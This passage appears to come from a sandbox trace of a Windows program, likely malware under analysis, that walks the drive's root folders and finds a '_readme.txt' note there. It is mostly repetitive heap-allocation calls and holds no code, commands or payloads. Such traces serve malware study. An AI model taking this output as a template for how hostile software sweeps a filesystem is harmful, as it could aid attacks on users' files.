lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.664] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa259c860, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa259c860, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.664] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x3112760 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f2f8 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f368 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.665] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.665] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c796360, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x9c796360, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9c796360, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.665] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.665] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x3165e90 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f368 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa90 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef248 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f2f8 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8d8 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb30 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef478 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.666] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3183660, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3183660, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31a97c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.666] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3183660, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3183660, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31a97c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.666] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.666] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.669] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.670] HeapFree (in: 